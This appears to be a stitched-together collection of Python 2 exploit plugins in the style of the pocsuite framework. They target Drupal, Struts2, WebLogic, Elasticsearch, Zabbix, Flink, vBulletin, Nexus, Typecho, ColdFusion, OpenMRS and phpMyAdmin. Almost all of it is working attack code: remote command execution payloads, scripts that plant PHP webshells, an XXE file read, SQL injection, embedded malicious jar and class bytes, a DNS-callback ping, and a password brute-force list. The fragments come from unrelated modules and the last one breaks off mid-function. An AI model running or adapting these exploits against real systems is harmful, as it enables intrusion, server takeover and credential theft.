def _attack(self): result = {} vul_url = '%s/user/register?element_parents=account/mail/%%23value&ajax_form=1&_wrapper_format=drupal_ajax' % self.url cmd = "echo ':=nfn ct_j($]NMQRYa[)9' | tr '.-x' '0-z'|tee 1.php" payload = { "form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": cmd } # if not self._verify(verify=False): # return self.parse_attack(result) # print urllib.urlencode(payload) response = req.post(vul_url, data=payload, proxies=proxies) # response = req.post(vul_url, data=payload) # print response.content if response.status_code == 200: res = req.post(url=self.url + "/1.php", data={"c": "system(\"id\");"}, proxies=proxies) if "uid" in res.content: # print res.content result['ShellInfo'] = {} result['ShellInfo']['URL'] = self.url + "/1.php" result['ShellInfo']['content'] = '<?php eval($_POST[c]);' return self.parse_attack(result)
def _verify(self): result = {} vulurl = urlparse.urljoin( self.url, 'index.php?do=ajax&view=upload&file_type=big&filename=filename') shell = "Ra<?php echo pocpocpocpoctesttesttest;unlink(__FILE__);?>" # 在本地新建一个文件 f = open('s.php', 'wb+') f.write(shell) f.flush() f.close() #上传文件 f = open('s.php', 'rb') files = [('filename', ('php.php', f, 'jpg'))] resp = req.post(vulurl, files=files) # 删除本地刚创建的文件 f.close() os.remove('s.php') # 匹配上传后的路径,并访问该路径验证是否上传成功,并删除已上传的文件 match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content) if match: url = urlparse.urljoin(self.url, '/' + match[0].replace('\\', '')) resp = req.post(url) if resp.status_code == 200 and 'pocpocpocpoctesttesttest' in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vulurl return self.parse_output(result)
def _verify(self): '''verify mode''' result = {} cmd = "cat /etc/passwd" target = self.parse_target(self.target, 9200) target_ip = target['address'] target_port = target['port'] schema = target['schema'] headers = { 'Host': '{}:{}'.format(target_ip, target_port), 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)', 'Accept': '*/*', 'Accept-Language': 'en', 'Connection': 'close', 'Content-Type': 'application/json', 'Content-Length': '25', } # 插入数据 payload = {"name": "phithon"} req.post(url='{}://{}:{}/website/blog/'.format(schema, target_ip, target_port), headers=headers, data=json.dumps(payload)) # 查询 headers.update({"Content-Length": '343'}) payload = { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"" + cmd + "\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } resp = req.post(url='{}://{}:{}/_search?pretty'.format( schema, target_ip, target_port), headers=headers, data=json.dumps(payload)) if resp: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = '{}://{}:{}/_search?pretty'.format( schema, target_ip, target_port) result['VerifyInfo']['Command'] = cmd result['VerifyInfo']['Result'] = json.loads(resp.text) return self.parse_output(result)
def _verify(self): result = {} url = self.url + "/index.php?m=member&c=index&a=register&siteid=1" username = randomStr(6) password = randomStr(6, '1234567890') data = { "siteid": "1", "modelid": "1", "username": "******" % (username), "password": "******" % (password), "email": "*****@*****.**" % (username), "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ", "dosubmit": "1", "protocol": "", } match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php" resp = req.post(url, data=data) shell = re.findall(match, resp.text) shellinfo = ''.join(shell[0]) + ".php" if shell: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url shell_resp = req.get(shellinfo) if shell_resp.status_code == 200: result['VerifyInfo']['webshell'] = shellinfo return self.parse_attack(result)
def exec_command(site, command): headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36', 'Content-Type': 'application/json;charset=utf-8', } jar_hash_name = check_jar_exsits(site, upload_jar_name) data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command if jar_hash_name: execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format( site, jar_hash_name, command) else: upload_execute_jar(site, upload_jar_name) jar_hash_name = check_jar_exsits(site, upload_jar_name) if jar_hash_name: execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format( site, jar_hash_name, command) else: return False try: r1 = req.post(execute_cmd_url, headers=headers, data=data, verify=False, timeout=20) match = re.findall('\|@\|(.*?)\|@\|', r1.text) delete_exists_jar(site, jar_hash_name) if match: return match[0][:-2] if match[ 0][:-2] else "[result is blank]" except req.exceptions.ReadTimeout as e: return "[execute timeout]" return False
def _verify(self, verify=True): result = {} url_list = [self.url] flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">', 'class=\"disableAjax\" title='] if "phpmyadmin" not in self.url.lower(): url_list.append(self.url + "/phpmyadmin/index.php") username_list = ['admin', 'root', 'test'] password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf', 'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$', 'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.', '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx'] for url in url_list: try: f_res = req.get(url, timeout=5) if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content: for username in username_list: for password in password_list: payload = {'pma_username': username, 'pma_password': password} headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} res = req.post(url, headers=headers, data=payload, timeout=5) for flag in flag_list: if flag in res.content and res.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = url result['VerifyInfo']['status_code'] = res.status_code result['VerifyInfo']['username'] = username result['VerifyInfo']['password'] = password result['username'] = username result['password'] = password return self.parse_attack(result) except Exception as e: raise e
def login(self): if self.params: user_info = eval(self.params) uname = user_info['username'] passwd = user_info['password'] else: uname = 'Admin' passwd = 'zabbix' payload = { "jsonrpc": "2.0", "method": "user.login", "params": { 'user': uname, 'password': passwd, }, "auth": None, "id": 0, } headers = { 'content-type': 'application/json', } try: auth = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers)) self.auth = auth.json() return True except: return False
def _verify(self): result = {} command = "echo 89aifh76ftq4fu38yfq498yf" payload = "Content-Type:%{(#_='multipart/form-data')." payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % command payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} response = req.post(self.url, headers=headers) if "89aifh76ftq4fu38yfq498yf" in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = response.url return self.parse_output(result)
def weblogic_rce(target): url = '{}/wls-wsat/CoordinatorPortType'.format(target) # content-type必须为text/xml payload_header = { 'content-type': 'text/xml', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' } try: r = req.post(url, payload_command(), headers=payload_header, verify=False) # 500时说明已成功反序列化执行命令 if r.status_code == 500: return verify_result(target) elif r.status_code == 404: return (False, '404 no vulnerability') else: return (False, '{} something went wrong'.format(r.status_code)) except req.exceptions.ReadTimeout: return (False, 'timeout') except Exception, ex: # raise return (False, str(ex))
def strust2_033(self,url): from urlparse import urljoin result = {} # S2-033 POC # Author: CF_HB # 时间:2016年6月6日 # 漏洞编号:CVE-2016-3087 (S2-033) # 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/ s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable" try: poc_url = urljoin(url,s2033_poc) #print poc_url s = req.session() res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False) print '033poc###################################' print res.content if res.status_code == 200 and "vulnerable" in res.content: #print "{url} is vulnerable S2-033.".format(url=url) exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami" target = urljoin(url, exp) res = req.post(target, timeout=3, allow_redirects=False, verify=False) restext = res.text.encode('utf-8').strip().strip('\x00') print '033exp###########################' print restext if 'command=whoami' not in restext: result['VerifyInfo'] = {} result['name'] = 'strust2_033' result['VerifyInfo']['URL'] = url result['VerifyInfo']['Payload'] = poc_url else: #print "{url} is not vulnerable..".format(url=url) pass except Exception, e: print e
def _attack(self): #定义返回结果 result = {} header = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Referer": self.url } payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==" data = { "__typecho_config":payload } #获取漏洞url vul_url = '%s' % self.url #获取处理后的url vul_url = self.url+"/install.php?finish=a" res = req.post(vul_url,headers=header,data=data) status = req.get(self.url+"/webshell.php").status_code if status == 200: result['VerifyInfo']={} result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0" result['VerifyInfo']['Payload']=data return self.save_output(result)
def login(self): if self.params: user_info = eval(self.params) uname = user_info['username'] passwd = user_info['password'] else: uname = 'Admin' passwd = 'zabbix' payload = { "jsonrpc" : "2.0", "method" : "user.login", "params": { 'user': uname, 'password': passwd, }, "auth" : None, "id" : 0, } headers = { 'content-type': 'application/json', } try: auth = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers)) self.auth = auth.json() return True except: return False
def upload_webshell(host, uri): set_new_upload_path(host, get_new_work_path(host)) upload_content = "POC test" headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', } files = { "ks_edit_mode": "false", "ks_password_front": "test", "ks_password_changed": "true", "ks_filename": ("test.jsp", upload_content) } resp = req.post(host + uri, files=files) response = resp.text match = re.findall("<id>(.*?)</id>", response) if match: tid = match[-1] shell_path = host + "/ws_utc/css/config/keystore/" + str( tid) + "_test.jsp" if upload_content in req.get(shell_path, headers=headers).content: print shell_path return True else: return False else: return False
def _netreq(self, target_url, username, password): result = {} flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 'class="disableAjax" title='] for _ in range(10): res = req.get(url = target_url) set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0] token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0] cookie = '' for x,y in res.cookies.get_dict().items(): cookie = cookie + "{}={};".format(x,y) header = { "Content-Type":"application/x-www-form-urlencoded", "Cookie": cookie } payload = { "set_session": set_session, "pma_username": username, "pma_password": password, "server": "1", "target": "index.php", "token": token } payload = urllib.urlencode(payload) response = req.post(url = target_url, data=payload, headers=header) for flag in flag_list: if flag in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['Payload'] = payload return result return result
def _verify(self): result = {} if self.login(): cmd = 'whoami' hostid = '10084' payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": "" + cmd + "" }, "auth": self.auth['result'], "id": 0, } headers = { 'content-type': 'application/json', } cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers) payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": hostid }, "auth": self.auth['result'], "id": 0, } cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=headers) cmd_exe = cmd_exe.json() if cmd_exe["result"]["response"] == 'success': result['VerifyInfo'] = {} result['VerifyInfo']['Url'] = self.url result['VerifyInfo']['Cmd'] = cmd result['VerifyInfo']['Value'] = cmd_exe['result']['value'] return self.parse_output(result)
def _verify(self): '''verify mode''' result = {} data = '''<?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string> </void> <void class="org.mozilla.classfile.DefiningClassLoader"> <void method="defineClass"> <string>com.supeream.exploits.XmlExp</string> <object idref="cls"></object> <void method="newInstance"> <void method="say" id="proc"> <string>whoami</string> </void> </void> </void> </void> <void class="java.lang.Thread" method="currentThread"> <void method="getCurrentWork"> <void method="getResponse"> <void method="getServletOutputStream"> <void method="writeStream"> <object idref="proc"></object> </void> <void method="flush"/> </void> <void method="getWriter"><void method="write"><string></string></void></void> </void> </void> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>''' headers = { 'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'text/xml', 'Content-Length': '{}'.format(len(data)) } resp = req.post(urljoin(self.url, '/wls-wsat/CoordinatorPortType'), headers=headers, data=data) if resp.status_code == 200 and resp.content and len(resp.content) < 20: result['VerifyInfo'] = "success" result['Username'] = resp.content.strip() return self.parse_output(result)
def _verify(self): result = {} target = urljoin(self.url, "/simplexml_load_string.php") http_body = '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>''' resp = req.post(target, data=http_body) if "x:0:0:root" in resp.text: result['VerifyInfo'] = "success" return self.parse_output(result)
def upload_execute_jar(site, upload_jar_name): upload_jar_url = "{}/jars/upload".format(site) file_content = base64.b64decode( 'UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAAAAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAKVkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLvCGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujCQNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJNaFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Qo0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNMKA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjoRF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqps0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJcVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEsOJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6EjptI4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IOYg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQAFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUGAAAAAAMAAwC4AAAArgQAAAAA' ) files = { 'jarfile': (upload_jar_name, cStringIO.StringIO(file_content), 'application/octet-stream') } try: req.post(upload_jar_url, headers=default_headers, files=files, timeout=30, verify=False) except Exception as e: return False return True
def _verify(self): result = {} if self.login(): cmd = 'whoami' hostid = '10084' payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth" : self.auth['result'], "id" : 0, } headers = { 'content-type': 'application/json', } cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers) payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": hostid }, "auth" : self.auth['result'], "id" : 0, } cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers) cmd_exe = cmd_exe.json() if cmd_exe["result"]["response"] == 'success': result['VerifyInfo'] = {} result['VerifyInfo']['Url'] = self.url result['VerifyInfo']['Cmd'] = cmd result['VerifyInfo']['Value'] = cmd_exe['result']['value'] return self.parse_output(result)
def _verify(self): # 调用指纹方法 result = {} vul_url = self.url target_url = vul_url + "/service/extdirect" headers = {'Referer': ''} import json j = { "action": "coreui_Component", "method": "previewAssets", "data": [{ "page": 1, "start": 0, "limit": 25, "filter": [{ "property": "repositoryName", "value": "*" }, { "property": "expression", "value": "1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()" .format(self.BANNER, self.DOMAIN) }, { "property": "type", "value": "jexl" }] }], "type": "rpc", "tid": 4 } try: resp = req.post(target_url, json=j, headers=headers, timeout=1) except Exception as e: print e import time time.sleep(2) # 休眠2s等待ceye生成记录 if self.dnslog_sucess(self.CEYE_URL): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) return self.save_output(result)
def _verify(self): result = {} target = self.url params = {"routestring":"ajax/render/widget_php"} random_int1 = random.randint(0,200000) random_int2 = random.randint(0,200000) params["widgetConfig[code]"] = "echo shell_exec('expr {} + {}'); exit;".format(random_int1,random_int2) r = req.post(target, data = params) if r.status_code == 200 and str(random_int1+random_int2) in r.text : result['result'] = {} result['result']['text'] = r.text return self.parse_attack(result)
def _verify(self): result = {} vulurl = "%s/?m=hotel.getHotelInfo" % self.url payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"} resp = req.post(vulurl,data = payload,timeout =15) re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I) if re_result: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vulurl result['VerifyInfo']['Payload'] = payload return self.parse_output(result)
def _verify(self): '''verify mode''' result = {} if urlparse(self.url).port is None: self.url = self.url + ":8500" url = urljoin( self.url, '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm') filename = randomStr(6) content = randomStr(12) data = "-----------------------------24464570528145\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format( filename=filename) data += "Content-Type: image/jpeg\r\n" data += "\r\n" data += "{content}\r\n".format(content=content) data += "-----------------------------24464570528145\r\n" data += "Content-Disposition: form-data; name=\"path\"\r\n" data += "\r\n" data += "we\r\n" data += "-----------------------------24464570528145--\r\n" header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145" } req.post(url, headers=header, data=data) file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename file_url = urljoin(self.url, file_path) response = req.get(file_url) if content in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Shell'] = file_url return self.parse_output(result)
def poc(url): proxy = {} ressource = "/openmrs/ws/rest/v1/concept" burp0_url = url + ressource burp0_headers = {"Content-Type": "application/xml"} try: r = req.post(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 500: while True: try: burp0_url = url + ressource burp0_headers = {"Content-Type": "text/xml"} burp0_data = "<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/bash</string>\r\n <string>-c</string>\r\n \t\t\t<string>{echo," + command_str + \ "}|{base64,-d}|{bash,-i}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>" r = req.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 500: m = re.search('(java.util.HashMap)', r.text) 